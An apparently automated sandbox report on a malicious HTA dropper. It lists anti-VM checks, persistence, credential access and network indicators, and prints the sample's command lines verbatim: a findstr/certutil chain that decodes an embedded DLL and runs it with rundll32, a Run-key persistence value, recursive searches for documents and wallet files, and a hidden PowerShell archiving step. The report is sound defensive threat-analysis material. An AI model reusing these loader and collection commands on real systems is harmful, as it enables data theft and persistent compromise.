Malware Analysis Report

2025-06-15 22:31

Sample ID 241102-jyrc5ssmcp
Target bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta
SHA256 bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234
Tags
collection defense_evasion discovery evasion execution persistence spyware stealer upx
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234

Threat Level: Likely malicious

The file bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta was found to be: Likely malicious.

Malicious Activity Summary

collection defense_evasion discovery evasion execution persistence spyware stealer upx

Command and Scripting Interpreter: PowerShell

Manipulates Digital Signatures

Blocklisted process makes network request

Looks for VMWare Tools registry key

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Deobfuscate/Decode Files or Information

Adds Run key to start application

Accesses Microsoft Outlook accounts

UPX packed file

Checks for VirtualBox DLLs, possible anti-VM trick

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Opens file in notepad (likely ransom note)

Modifies Internet Explorer settings

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-02 08:04

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-02 08:04

Reported

2024-11-02 08:07

Platform

win7-20240903-en

Max time kernel

149s

Max time network

152s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\rundll32.exe | N/A
N/A | N/A | C:\Windows\system32\rundll32.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Looks for VMWare Tools registry key

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools | C:\Windows\system32\rundll32.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\system32\rundll32.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Network Service = "rundll32 C:\\Users\\Admin\\AppData\\Local\\netserv32.dll,MainWork" | C:\Windows\system32\rundll32.exe | N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\certutil.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\certutil.exe | N/A

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description | Indicator | Process | Target
File opened (read-only) | \??\VBoxMiniRdrDN | C:\Windows\system32\rundll32.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\certutil.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\certutil.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A

Opens file in notepad (likely ransom note)

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\rundll32.exe | N/A
N/A | N/A | C:\Windows\system32\rundll32.exe | N/A
N/A | N/A | C:\Windows\system32\rundll32.exe | N/A
N/A | N/A | C:\Windows\system32\rundll32.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2496 wrote to memory of 2944 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 2944 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 2944 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 2944 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 3000 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 3000 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 3000 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 3000 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2944 wrote to memory of 2864 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 2944 wrote to memory of 2864 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 2944 wrote to memory of 2864 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 2944 wrote to memory of 2864 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 3000 wrote to memory of 2756 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 3000 wrote to memory of 2756 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 3000 wrote to memory of 2756 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 3000 wrote to memory of 2756 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 2944 wrote to memory of 2984 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\certutil.exe
PID 2944 wrote to memory of 2984 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\certutil.exe
PID 2944 wrote to memory of 2984 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\certutil.exe
PID 2944 wrote to memory of 2984 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\certutil.exe
PID 3000 wrote to memory of 2204 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\certutil.exe
PID 3000 wrote to memory of 2204 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\certutil.exe
PID 3000 wrote to memory of 2204 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\certutil.exe
PID 3000 wrote to memory of 2204 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\certutil.exe
PID 3000 wrote to memory of 2724 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\rundll32.exe
PID 3000 wrote to memory of 2724 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\rundll32.exe
PID 3000 wrote to memory of 2724 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\rundll32.exe
PID 3000 wrote to memory of 2724 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\rundll32.exe
PID 3000 wrote to memory of 2724 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\rundll32.exe
PID 3000 wrote to memory of 2724 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\rundll32.exe
PID 3000 wrote to memory of 2724 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\rundll32.exe
PID 2724 wrote to memory of 2844 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\system32\rundll32.exe
PID 2724 wrote to memory of 2844 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\system32\rundll32.exe
PID 2724 wrote to memory of 2844 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\system32\rundll32.exe
PID 2724 wrote to memory of 2844 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\system32\rundll32.exe
PID 2944 wrote to memory of 2604 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2944 wrote to memory of 2604 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2944 wrote to memory of 2604 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2944 wrote to memory of 2604 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2844 wrote to memory of 1928 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1928 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1928 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1828 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1828 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1828 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1260 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1260 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1260 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 448 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 448 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 448 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2392 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2392 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2392 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2924 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2924 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2924 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log password.txt & del 1.log && password.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local & findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log netserv32.dll & del 1.log & rundll32 netserv32.dll,MainWork

C:\Windows\SysWOW64\findstr.exe

findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"

C:\Windows\SysWOW64\findstr.exe

findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"

C:\Windows\SysWOW64\certutil.exe

certutil -decode -f 1.log password.txt

C:\Windows\SysWOW64\certutil.exe

certutil -decode -f 1.log netserv32.dll

C:\Windows\SysWOW64\rundll32.exe

rundll32 netserv32.dll,MainWork

C:\Windows\system32\rundll32.exe

rundll32 netserv32.dll,MainWork

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\password.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -w hidden Compress-Archive -CompressionLevel Optimal -Path "C:\Users\Admin\AppData\Local\Temp\nsv9B18.tmp" "C:\Users\Admin\AppData\Local\micro.log.zip"

C:\Windows\system32\cmd.exe

cmd.exe /c dir C:\Users\Admin\*.hwp C:\Users\Admin\*.pdf C:\Users\Admin\*.doc C:\Users\Admin\*.docx C:\Users\Admin\*.xls C:\Users\Admin\*.xlsx C:\Users\Admin\*.zip C:\Users\Admin\*.rar C:\Users\Admin\*.egg C:\Users\Admin\*.txt C:\Users\Admin\*.jpg C:\Users\Admin\*.png C:\Users\Admin\*.jpeg C:\Users\Admin\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir C:\Users\Admin\*wallet* C:\Users\Admin\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir d:\*.hwp d:\*.pdf d:\*.doc d:\*.docx d:\*.xls d:\*.xlsx d:\*.zip d:\*.rar d:\*.egg d:\*.txt d:\*.jpg d:\*.png d:\*.jpeg d:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir d:\*wallet* d:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir f:\*.hwp f:\*.pdf f:\*.doc f:\*.docx f:\*.xls f:\*.xlsx f:\*.zip f:\*.rar f:\*.egg f:\*.txt f:\*.jpg f:\*.png f:\*.jpeg f:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir f:\*wallet* f:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | cdn.glitch.global | udp
US | 151.101.2.132:80 | cdn.glitch.global | tcp
US | 131.153.13.235:80 | 131.153.13.235 | tcp

Files

C:\Users\Admin\AppData\Local\Temp\1.log

MD5 2ac7510166832b4a6e4344f37d944578
SHA1 c766dd5112d72620614842d4bf0e986c34c5a2d0
SHA256 09e4c6d57fbf21a95fab469149ac50d73ee046f2bc2e57b6565eb0e9adf9e1ad
SHA512 ecb5c29e8e1d81b914b1d4c3e2787cf2b78d5707473f368aa48df6af1b7235adac5f96ccd43cfc0501f93640b52dd4b06905c889ffd0e9b7c989e150c89e521a

C:\Users\Admin\AppData\Local\1.log

MD5 71593a662d03e58b27b29ab199a6d7b5
SHA1 d24e55399d35ac3a25f1b6a8d3bdd0e3e37db5d2
SHA256 e6da91d2fc4d3029e3915e9f7fc9586bf76f8ee024082c05ee4e5bf0f174c237
SHA512 c8005c9131b575f15ccd8bcde0fe66f820fff8b4c54800fdcaf814c1aede5f98343854276c301210c0935bf2669f925eafc2ecd15ff88496ededd918bfca3b07

\Users\Admin\AppData\Local\netserv32.dll

MD5 56d4fcfa7eb3a84740081264c5c0f10a
SHA1 06edf5464d2cfe1a75f3600c9039eabab97248bd
SHA256 5a18a29791cfb18767a43bebb61f923e64be7988235213678514007174f60b3e
SHA512 df622d9aebc8b9367219777216ba7e21942974e048fa40233fb17d17a85d940f8301ab4c605703cfa4b9ffdc61f2095b2a96b6256d017b445e40e94aedfd8609

memory/2724-36-0x0000000000220000-0x000000000023F000-memory.dmp

memory/2724-33-0x0000000000220000-0x000000000023F000-memory.dmp

memory/2724-35-0x0000000000220000-0x000000000023F000-memory.dmp

memory/2724-34-0x0000000000220000-0x000000000023F000-memory.dmp

memory/2844-54-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp

memory/2844-53-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

memory/2844-52-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\password.txt

MD5 6a0e721cb89a06736206b91af92239cd
SHA1 bb87db8bbcb512a584c45c80504fc21a0a972b3a
SHA256 a5a56f7eed7db360188ca88386bed5c84a8146b99ece4e68a3abfdbb5f091015
SHA512 c9921cafd2a284c3bc32b845685e25f03bc9fbaa380dbecbe8bfd9ec4992d5cf4a832e462cf097bcbc12f1ae3b00a0c8e7688be373aede81a9bd331d400b6a0c

memory/2844-64-0x0000000180000000-0x0000000180127000-memory.dmp

C:\Users\Admin\AppData\Local\net

MD5 de9438683614ccf3f0316139418985a9
SHA1 dcbbfb18c16f4bf9025233e6ecf42be64c33932d
SHA256 d5ec8265369b5f52a14b039c1f9495a343a9755a89b0c48db5983c94d140f18b
SHA512 925a919ecbe169adc2ebb10b9f93cc33ab5ba44794d3fccd0d7f2faa49c8a35b46e3c6779d0e357122433461bf48fc4af2f9571fae0aa11fd85c9dcc26a47470

memory/2844-67-0x0000000180000000-0x0000000180127000-memory.dmp

memory/2844-68-0x0000000180000000-0x0000000180127000-memory.dmp

memory/1928-85-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

memory/1928-86-0x0000000002890000-0x0000000002898000-memory.dmp

memory/2724-92-0x0000000000220000-0x000000000023F000-memory.dmp

memory/2724-94-0x0000000000220000-0x000000000023F000-memory.dmp

C:\Users\Admin\AppData\Local\notepad.log

MD5 6199c9d0ad1df4105c85ae041e833a0e
SHA1 c9016a4bcd8bd2ea646dfa86e2c9c59cd9f50fd1
SHA256 c45b1bb615385f2b2b2c1bfb29646a89ef9beb9c4f00cbb5f16c02171c61bcf4
SHA512 b2b972ba63cfb93c6b59634ecf5f8ffda04c74ba9ee86dbd8fefea43ff408f86718a75a0e9282ba5fe122cb3079511847c6775393e1e2d5c556ec3e8ab599de3

memory/2844-101-0x0000000180000000-0x0000000180032000-memory.dmp

memory/2844-117-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp

memory/2844-119-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp

memory/2844-118-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

memory/2844-121-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

\??\c:\users\admin\appdata\local\netlist.log

MD5 4c3a362b3f3e30e0d09cf23cf206d4f3
SHA1 8c83105c017fdd64b2bc094f295bfaa8ce074b39
SHA256 47efee3b0891b28c7ad69ba95c06f5fd2a45e0df0e4ec62307a24793a51b52bd
SHA512 c78174e522de99a4774b764d0b465d8dc0035d4aa4e46a5306f3985afc814af0290c1af11b78c0656d6915b0ddc36ecc726a21666694ebecc87277120f9dfda4

\??\c:\users\admin\appdata\local\netlist.log

MD5 38eb30a99834452a25809864e7116beb
SHA1 80271700c164e13a7a871d8530a71898bf4a64bc
SHA256 77062eba27314013f04f6a3aad6c6d60d5e2a9a9a289ea34fd83e87ccf9167b0
SHA512 48e013c5ca505310ee98f059c84fc619e1e41b03ab3fc9248688194e75eaa8a56bc7a6a68cb100c42115170b5791ba29d66ad381f2e4298660f0c72f8c4ed208

memory/2844-134-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

memory/2844-139-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

memory/2844-140-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-02 08:04

Reported

2024-11-02 08:07

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

155s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\rundll32.exe | N/A
N/A | N/A | C:\Windows\system32\rundll32.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Looks for VMWare Tools registry key

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools | C:\Windows\system32\rundll32.exe | N/A

Manipulates Digital Signatures

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" | C:\Windows\SysWOW64\certutil.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" | C:\Windows\SysWOW64\certutil.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" | C:\Windows\SysWOW64\certutil.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" | C:\Windows\SysWOW64\certutil.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" | C:\Windows\SysWOW64\certutil.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" | C:\Windows\SysWOW64\certutil.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A
N/A | N/A | C:\Windows\system32\rundll32.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\system32\rundll32.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Service = "rundll32 C:\\Users\\Admin\\AppData\\Local\\netserv32.dll,MainWork" | C:\Windows\system32\rundll32.exe | N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\certutil.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\certutil.exe | N/A

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description | Indicator | Process | Target
File opened (read-only) | \??\VBoxMiniRdrDN | C:\Windows\system32\rundll32.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\certutil.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\certutil.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A

Opens file in notepad (likely ransom note)

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
